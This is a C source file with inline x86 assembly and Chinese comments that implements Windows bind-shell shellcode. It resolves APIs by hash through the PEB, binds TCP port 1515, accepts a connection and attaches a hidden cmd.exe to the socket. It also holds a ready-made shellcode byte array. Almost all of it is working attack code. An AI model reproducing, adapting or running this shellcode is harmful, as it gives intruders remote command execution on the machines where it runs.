




__declspec(naked) void  asmShellCodeHelloWrold()
{
	__asm {

		sub	esp, 0x20    //开辟一段栈空间增加健壮性
			push	ebp
			mov	ebp, esp
			sub	esp, 0x10	//前置代码,避免后面数据被解释为指令


			jmp	tag_Shellcode

			//[tag_next-0x25] "cmd.exe\0"

		_asm _emit(0x63)  _asm _emit(0x6d)   _asm _emit(0x64)  _asm _emit(0x2e)
		_asm _emit(0x65)  _asm _emit(0x78)   _asm _emit(0x65)  _asm _emit(0x00)

		//[tag_next-0x1d]"ws2_32.dll\0"
		_asm _emit(0x77)  _asm _emit(0x73)   _asm _emit(0x32)  _asm _emit(0x5f)
		_asm _emit(0x33)  _asm _emit(0x32)   _asm _emit(0x2e)  _asm _emit(0x64)
		_asm _emit(0x6c)  _asm _emit(0x6c)   _asm _emit(0x00)

		//[tag_next-0x12]"kernel32.dll\0"
		_asm _emit(0x6b)  _asm _emit(0x65)   _asm _emit(0x72)  _asm _emit(0x6e)
		_asm _emit(0x65)  _asm _emit(0x6c)   _asm _emit(0x33)  _asm _emit(0x32)
		_asm _emit(0x2e)  _asm _emit(0x64)   _asm _emit(0x6c)  _asm _emit(0x6c)
		_asm _emit(0x00)

tag_Shellcode:

					 //1. GetPC
					 call	tag_Next

tag_Next :

					 pop	ebx				//ebx  		=	BaseAddr
						 mov[ebp - 0x04], ebx		//Local_1	=	Shellcode BaseAddr

													//2.获取关键模块基址
						 mov    esi, dword ptr fs : [0x30]		//esi 		=	指向PEB_LDR_DATA结构的指针
						 mov    esi, [esi + 0x0c]		//esi 		= 	模块链表指针InInit...List
						 mov    esi, [esi + 0x1c]		//esi		= 	访问链表中的第二个条目
						 mov    esi, [esi]			//esi		=	访问链表中的第二个条目
						 mov    edx, [esi + 0x08]		//edx 		= 	获取kernel32.dll基址

														//3.获取LoadLibraryExA的函数地址
						 push	edx				//ImageBase	=	kernel32.dll
						 push	0xc0d83287			//nHashDigetst	=	LoadLibraryExA	Digest
						 call	fun_GetFunAddrByHash		//fun_GetFunAddrByHash
						 mov	edi, eax				//edi		=	LoadLibraryExA

														//4.加载kernel32.dll, 增强兼容性	(Win 7 取得的是kernelbase.dll的基地址)
						 lea	esi, [ebx - 0x12]		//eax = "kernel32.dll\0"
						 push	0				// /-dwFlags	= 	0
						 push	0				// |-hFile	=	0
						 push   	esi				// \-lpDllFileName = "kernel32.dll"
						 call	edi 				// LoadLibraryExA()
						 mov[ebp - 0x08], eax		// Local_2 = kernel32.dll基址

													//5.加载ws2_32.dll,方便后面的网络通信编程
						 lea 	esi, [ebx - 0x1d]		//eax = "ws2_32.dll\0"
						 push	0				//  /-dwFlags	= 0
						 push	0				//  |-hFile	= 0
						 push	esi				//  |-lpLibFileName = "ws2_32.dll"
						 call	edi                             //  LoadLibraryExA()
						 mov[ebp - 0x0c], eax		//  Local_3 	= ws2_32.dll 基址

													//6. 执行Payload部分
						 push[ebp - 0x0c]			//ws2_32.dll 	基址
						 push[ebp - 0x08]			//kernel32.dll  基址
						 push[ebp - 0x04]			//baseAddr
						 call	fun_Payload

						 //7. Payload执行完毕,结束程序,防止被调试分析
						 push[ebp - 0x08]			// /-ImageBase 	=  Param_2(kernel32.dll)
						 push	0x4fd18963			// \-nHashDigest	=  ExitProcess Digest
						 call	fun_GetFunAddrByHash		// fun_GetFunAddrByHash
						 push	0				// -uExitCode 	=  NULL
						 call	eax				// ExitProcess()
						 mov	esp, ebp
						 pop	ebp


/*************************************************/
/* 	函数: Payload,  返回值 NULL 		 */
/*************************************************/

 fun_Payload:  //(int BaseAddr,  int Kernel32Base,  int ws2_32_base)
					 push	ebp
						 mov	ebp, esp
						 sub	esp, 0x300

						 //1.初始化Winsock服务
						 push[ebp + 0x10]			// /-ImageBase  == Param_3(ws2_32_base)
						 push	0x80b46a3d			// \-nHashDigest== WSAStartup Digest
						 call	fun_GetFunAddrByHash		// fun_GetFunAddrByHash
						 lea	esi, [ebp - 0x300]		// esi 		= WSADATA
						 push	esi				// /-lpWSAData 	= WSADATA
						 push	0x2020				// |-wVersionRequested = 2.2
						 call	eax				// WSAStartup()
						 test	eax, eax
						 jnz	tag_PaloadEnd

						 //2.创建要给原始套接字
						 push[ebp + 0x10]			// ImageBase	= Param_3(ws2_32.dll)
						 push	0xde78322d			// nHashDigest	= WsASocketA  Digest
						 call	fun_GetFunAddrByHash		// fun_GetFunAddrByHash
						 push	0				// /-dwFlags	= NULL
						 push	0				// |-g		= NULL
						 push	0				// |-lpProtocolInfo = NULL
						 push	6				// |-protocol	= IPPROTO_TCP
						 push	1				// |-type	= SOCK_STREAM
						 push	2				// \-af		= AF_INET
						 call	eax				// WSASocketA()
						 mov    [ebp - 0x04],eax  // Local_1  = SOCKET
												//3.在任意地址(INADDR_ANY)上绑定一个端口1515[0x05BE->0xBE05]
						 push[ebp + 0x10]			//ImageBase  	= Param_3(ws2_32.dll)
						 push	0xdda71064			//nHashDigest	= bind Digest
						 call	fun_GetFunaddrByHash		//fun_GetFunAddrByHash

						 mov	word ptr[ebp - 0x200], 0x02	// /-SOCKADDR_IN.sin_family = AF_INET
						 mov	word ptr[ebp - 0x1FE], 0xEB05	// |-SOCKADDR_IN.sin_port   = 0xEB05(1515)
						 mov	dword ptr[ebp - 0x1FC], 0	// \-SICKADDR_IN.sin_addr   = INADDR_ANY
						 lea	esi, [ebp - 0x200]		// esi = SICKADDR_IN
						 push	0x14				// /-namelen 	= 0x14
						 push	esi				// |-name	= SOCKADDR_IN
						 push[ebp - 0x04]			// \-s		= Local_1(SOCKET)
						 call	eax				// bind()
						 test	eax, eax
						 jnz	tag_PaloadEnd

						 //4.监听申请的连接, 队列中可容纳5个连接
						 push[ebp + 0x10]			// /-ImageBase	= Param_3(ws2_32.dll)
						 push	0x4bd39f0c			// \-nHashDigest= listen Digest
						 call	fun_GetFunAddrByHash		// fun_GetFunAddrBuHash
						 push	0x7fffffff			// /-backlog	= SOMAXCONN
						 push[ebp - 0x04]			// \-s		= Local_1(SOCKET)
						 call	eax				// listen()

						 test	eax, eax
						 jnz	tag_PaloadEnd

						 //5.接收一个连接
						 push[ebp + 0x10]			// /-ImageBase  = Param_3(ws2_32.dll)
						 push	0x01971eb1			// \-nHashDigest= accpet Digest
						 call	fun_GetFunAddrByHash		// fun_GetFunAddrByHash

						 push	0				// /-addrlen	= NULL
						 push	0				// |-addr	= NULL
						 push[ebp - 0x04]			// \-s		= Local_1(SOCKET)
						 call	eax				// accept()

						 mov[ebp - 0x04], eax		// Local_1(SOCKET) = SOCKET

													//6.创建一个CMD进程,并将其输入域输出重定位我们创建的套接字上
						 push[ebp + 0xc]			// /- ImageBase = Param_2(kernel32.dll)
						 push	0x6ba6bcc9			// \- nHashDigest= CreateProcessA Digest
						 call	fun_GetFunAddrByHash		// fun_GetFunAddrBuHash

						 mov	edx, eax				// edx 		= CreateProcessA
						 lea	edi, [ebp - 0x90]		//    清空 STARTUPINFOA
						 mov	ecx, 0x11			// 	   STARTUPINFOA
						 mov	eax, 0x00			// 	 从[ebp - 0x90]开始
						 cld					//       到[ebp - 0x48]结束
						 rep	stosd				//
						 mov	dword  ptr[ebp - 0x90], 0x00000044  // STA...A.cb	=48
						 mov	dword  ptr[ebp - 0x64], 0x00000100  // STA...A.dwFlags  =STARTF
						 mov	word   ptr[ebp - 0x60], 0x0000	    // STA...A.wShowWindow = SW_HIDE
						 mov	esi, [ebp - 0x04]		    // esi =  Local_1(SOCKET)
						 mov	dword  ptr[ebp - 0x58], esi	    // STA...A.hStdInput  =SOCKET
						 mov	dword  ptr[ebp - 0x54], esi	    // STA...A.hStdOutput = SOCKET
						 mov	dword  ptr[ebp - 0x50], esi	    // STA...A.hStdError  = SOCKET
						 lea	esi, [ebp - 0x90]		//esi 		= STARTUPINFOA
						 lea	edi, [ebp - 0x200]		//edi		= PROCESS_INFOMATION
						 mov	ebx, [ebp + 0x08]		//ebx		= Param_1(BaseAddr)
						 lea	ebx, [ebx - 0x25]		//ebx 		= "cmd.exe\0"

						 push	edi	// /-lpProcessInforMation = PROCESS_INFORMATION
						 push	esi	// |-lpStartupInfo	  = STARTUPINFOA
						 push	0	// |-lpCurrentDirectory	  = NULL
						 push	0	// |-lpEnvironment	  = NULL
						 push    0	// |-lpCreationFlags	  = NULL
						 push	1	// |-bInheritHandles	  = TRUE
						 push	0	// |-lpThreadAttributes	  = NULL
						 push	0	// |-lpProcessAttributes  = NULL
						 push	ebx	// |-lpCommandLine	  = "cmd.exe\0"	
						 push	0	// \-lpArrlicationName	  = NULL
						 call	edx	// CreateProcessA()

						 tag_PaloadEnd :
					 mov	esp, ebp
						 pop	ebp
						 retn	0xc

 

fun_Hash_CmpString :	//(char * strFunName, int nDigest)
				push	ebp
				mov	ebp, esp
				sub	esp, 0x04 //开辟局部变量
				mov	dword ptr[ebp - 0x04], 0x00
				push	ebx
				push	ecx
				push	edx
				mov	esi, [ebp + 0x8]  //esi = Param_1(strFunName)
				xor ecx, ecx
				xor	eax, eax
tag_HashLoop :

				mov	al, [esi + ecx]	 // al = 字符串的第 ECX个字符
				test	al, al		 // 判断是否为0,  为0则结束循环
				jz	tag_HashEnd
				mov	ebx, [ebp - 0x04] // ebx = LOCAL_1(摘要)
				shl	ebx, 0x19	 // ebx = 摘要<<0x19(25)
				mov	edx, [ebp - 0x04] // edx = Local_1(摘要)
				shr	edx, 0x07	 // edx = 摘要>>0x07(07)
				or ebx, edx		 // edx = ebx | edx
				add     ebx, eax
				mov[ebp - 0x04], ebx // edx = edx + 字符的ASCII
				inc	ecx		 // ecx ++
				jmp	tag_HashLoop

				tag_HashEnd :
				mov	ebx, [ebp + 0x0c] //ebx = wParam_2(nDigest)
				mov	edx, [ebp - 0x04] //edx = Local_1(摘要)
				xor eax, eax
				cmp	ebx, edx
				jne	tag_FunEnd
				mov	eax, 1
tag_FUnEnd:
				pop	edx
				pop	ecx
				pop	ebx
				mov	esp, ebp
				pop	ebp
				retn    0x08

				/**************************************************************/
				/*  函数: 根据hash值获取指定的函数地址,  返回值为关键函数地址 */
				/**************************************************************/
fun_GetFunAddrByHash:   //(int nHashDigest, int ImageBase)
				push	ebp
				mov	ebp, esp
				sub	esp, 0x0c
				push	edx

				//1. 获取EAT, ENT与 EOT的地址
				mov	edx, [ebp + 0x0c]		//edx  =  Param_1(ImageBase)
				mov	esi, [edx + 0x3c]		//IMAGE_DOS)HEADER.e_lfanew
				lea	esi, [edx + esi]		//esi  =  pe头文件

				mov	esi, [esi + 0x78]		//esi  =  IMAGE_DIR...EXPORT.VirtualAddress
				lea	esi, [edx + esi]		//esi  =  导出表首地址

				mov	edi, [esi + 0x1c]		//esi  =  IMAGE_EXP...ORY.AddressOfFunctions
				lea	edi, [edx + edi]		//edi  =  EAT首地址
				mov[ebp - 0x04], edi		//Local_1 = edi = EAT首地址	

				mov	edi, [esi + 0x20]		//edi  =  IMAGE_EXP...ORY.AddressOfNames
				lea	edi, [edx + edi]		//edi  =  ENT首地址
				mov[ebp - 0x08], edi		//Local_2 = edi = ENT首地址

				mov	edi, [esi + 0x24]		//edi  = IMAGE_EXP...ORY.AddressOfNameOrdinals
				lea	edi, [edx + edi]		//edi  = EOT首地址
				mov[ebp - 0x0c], edi		//Local_3 = edi = EOT首地址


						//2.循环比较ENT中的函数名
				xor	ecx, ecx
				jmp	tag_FirstCmp

tag_CmpFunNameLoop :
				inc	ecx

tag_FirstCmp :
				mov	esi, [ebp - 0x08]		//esi = Local_2(ENT)
				mov	esi, [esi + 4 * ecx]		//esi = ENT  RVA
				mov	edx, [ebp + 0x0c]		//edx = Param_1(ImageBase)
				lea	esi, [edx + esi]		//esi = ENT  VA

				push[ebp + 0x08]			//nDigest  = Param_1(nHashDigest)
				push    esi				//strFunName = ENT VA
				call	fun_Hash_CmpString		//fun_Hash_CmpString
				test	eax, eax
				je	tag_CmpFunNameLoop		//如果不相等则继续循环比对

							//3.成功后找到对应的序号
				mov	esi, [ebp - 0x0c]		//esi = Local_3(EOT)
				xor edi, edi
				mov	di, [esi + ecx * 2]		//edi = 用函数名索引找 序号数组中的位置

							//4.使用序号作为索引,找到地址
				mov	edx, [ebp - 0x04]		//edx = Local_1(EAT)
				mov	esi, [edx + edi * 4]		//esi = 用序号在函数数组找到对应的函数地址
				mov	edx, [ebp + 0x0c]		//edx = Param_1(ImageBase)

							//5.返回获取到的关键函数地址
				lea	eax, [edx + esi]			//返回GetProcAddress的地址
				pop	edx
				mov	esp, ebp
				pop	ebp
				retn    0x08




	}

}



void  main() 
{
	asmShellCodeHelloWrold();
}



char bShellcode[] = {
0x83,0xEC,0x20,0x55,	0x8B,0xEC,0x83,0xEC,	0x10,0xEB,0x20,0x63,	0x6D,0x64,0x2E,0x65,
0x78,0x65,0x00,0x77,	0x73,0x32,0x5F,0x33,	0x32,0x2E,0x64,0x6C,	0x6C,0x00,0x6B,0x65,
0x72,0x6E,0x65,0x6C,	0x33,0x32,0x2E,0x64,	0x6C,0x6C,0x00,0xE8,	0x00,0x00,0x00,0x00,
0x5B,0x89,0x5D,0xFC,	0x64,0x8B,0x35,0x30,	0x00,0x00,0x00,0x8B,	0x76,0x0C,0x8B,0x76,

0x1C,0x8B,0x36,0x8B,	0x56,0x08,0x52,0x68,	0x87,0x32,0xD8,0xC0,	0xE8,0xBD,0x01,0x00,
0x00,0x8B,0xF8,0x8D,	0x73,0xEE,0x6A,0x00,	0x6A,0x00,0x56,0xFF,	0xD7,0x89,0x45,0xF8,
0x8D,0x73,0xE3,0x6A,	0x00,0x6A,0x00,0x56,	0xFF,0xD7,0x89,0x45,	0xF4,0xFF,0x75,0xF4,
0xFF,0x75,0xF8,0xFF,	0x75,0xFC,0xE8,0x14,	0x00,0x00,0x00,0xFF,	0x75,0xF8,0x68,0x63,

0x89,0xD1,0x4F,0xE8,	0x86,0x01,0x00,0x00,	0x6A,0x00,0xFF,0xD0,	0x8B,0xE5,0x5D,0x55,
0x8B,0xEC,0x81,0xEC,	0x00,0x03,0x00,0x00,	0xFF,0x75,0x10,0x68,	0x3D,0x6A,0xB4,0x80,
0xE8,0x69,0x01,0x00,	0x00,0x8D,0xB5,0x00,	0xFD,0xFF,0xFF,0x56,	0x68,0x20,0x20,0x00,
0x00,0xFF,0xD0,0x85,	0xC0,0x0F,0x85,0xFF,	0x00,0x00,0x00,0xFF,	0x75,0x10,0x68,0x2D,

0x32,0x78,0xDE,0xE8,	0x46,0x01,0x00,0x00,	0x6A,0x00,0x6A,0x00,	0x6A,0x00,0x6A,0x06,
0x6A,0x01,0x6A,0x02,	0xFF,0xD0,0x89,0x45,	0xFC,0xFF,0x75,0x10,	0x68,0x64,0x10,0xA7,
0xDD,0xE8,0x28,0x01,	0x00,0x00,0x66,0xC7,	0x85,0x00,0xFE,0xFF,	0xFF,0x02,0x00,0x66,
0xC7,0x85,0x02,0xFE,	0xFF,0xFF,0x05,0xEB,	0xC7,0x85,0x04,0xFE,	0xFF,0xFF,0x00,0x00,

0x00,0x00,0x8D,0xB5,	0x00,0xFE,0xFF,0xFF,	0x6A,0x14,0x56,0xFF,	0x75,0xFC,0xFF,0xD0,
0x85,0xC0,0x0F,0x85,	0xA2,0x00,0x00,0x00,	0xFF,0x75,0x10,0x68,	0x0C,0x9F,0xD3,0x4B,
0xE8,0xE9,0x00,0x00,	0x00,0x68,0xFF,0xFF,	0xFF,0x7F,0xFF,0x75,	0xFC,0xFF,0xD0,0x85,
0xC0,0x0F,0x85,0x83,	0x00,0x00,0x00,0xFF,	0x75,0x10,0x68,0xB1,	0x1E,0x97,0x01,0xE8,

0xCA,0x00,0x00,0x00,	0x6A,0x00,0x6A,0x00,	0xFF,0x75,0xFC,0xFF,	0xD0,0x89,0x45,0xFC,
0xFF,0x75,0x0C,0x68,	0xC9,0xBC,0xA6,0x6B,	0xE8,0xB1,0x00,0x00,	0x00,0x8B,0xD0,0x8D,
0xBD,0x70,0xFF,0xFF,	0xFF,0xB9,0x11,0x00,	0x00,0x00,0xB8,0x00,	0x00,0x00,0x00,0xFC,
0xF3,0xAB,0xC7,0x85,	0x70,0xFF,0xFF,0xFF,	0x44,0x00,0x00,0x00,	0xC7,0x45,0x9C,0x00,

0x01,0x00,0x00,0x66,	0xC7,0x45,0xA0,0x00,	0x00,0x8B,0x75,0xFC,	0x89,0x75,0xA8,0x89,
0x75,0xAC,0x89,0x75,	0xB0,0x8D,0xB5,0x70,	0xFF,0xFF,0xFF,0x8D,	0xBD,0x00,0xFE,0xFF,
0xFF,0x8B,0x5D,0x08,	0x8D,0x5B,0xDB,0x57,	0x56,0x6A,0x00,0x6A,	0x00,0x6A,0x00,0x6A,
0x01,0x6A,0x00,0x6A,	0x00,0x53,0x6A,0x00,	0xFF,0xD2,0x8B,0xE5,	0x5D,0xC2,0x0C,0x00,

0x55,0x8B,0xEC,0x83,	0xEC,0x04,0xC7,0x45,	0xFC,0x00,0x00,0x00,	0x00,0x53,0x51,0x52,
0x8B,0x75,0x08,0x33,	0xC9,0x33,0xC0,0x8A,	0x04,0x0E,0x84,0xC0,	0x74,0x16,0x8B,0x5D,
0xFC,0xC1,0xE3,0x19,	0x8B,0x55,0xFC,0xC1,	0xEA,0x07,0x0B,0xDA,	0x03,0xD8,0x89,0x5D,
0xFC,0x41,0xEB,0xE3,	0x8B,0x5D,0x0C,0x8B,	0x55,0xFC,0x33,0xC0,	0x3B,0xDA,0x75,0x05,

0xB8,0x01,0x00,0x00,	0x00,0x5A,0x59,0x5B,	0x8B,0xE5,0x5D,0xC2,	0x08,0x00,0x55,0x8B,
0xEC,0x83,0xEC,0x0C,	0x52,0x8B,0x55,0x0C,	0x8B,0x72,0x3C,0x8D,	0x34,0x32,0x8B,0x76,
0x78,0x8D,0x34,0x32,	0x8B,0x7E,0x1C,0x8D,	0x3C,0x3A,0x89,0x7D,	0xFC,0x8B,0x7E,0x20,
0x8D,0x3C,0x3A,0x89,	0x7D,0xF8,0x8B,0x7E,	0x24,0x8D,0x3C,0x3A,	0x89,0x7D,0xF4,0x33,

0xC9,0xEB,0x01,0x41,	0x8B,0x75,0xF8,0x8B,	0x34,0x8E,0x8B,0x55,	0x0C,0x8D,0x34,0x32,
0xFF,0x75,0x08,0x56,	0xE8,0x67,0xFF,0xFF,	0xFF,0x85,0xC0,0x74,	0xE6,0x8B,0x75,0xF4,
0x33,0xFF,0x66,0x8B,	0x3C,0x4E,0x8B,0x55,	0xFC,0x8B,0x34,0xBA,	0x8B,0x55,0x0C,0x8D,
0x04,0x32,0x5A,0x8B,	0xE5,0x5D,0xC2,0x08,	0x00
};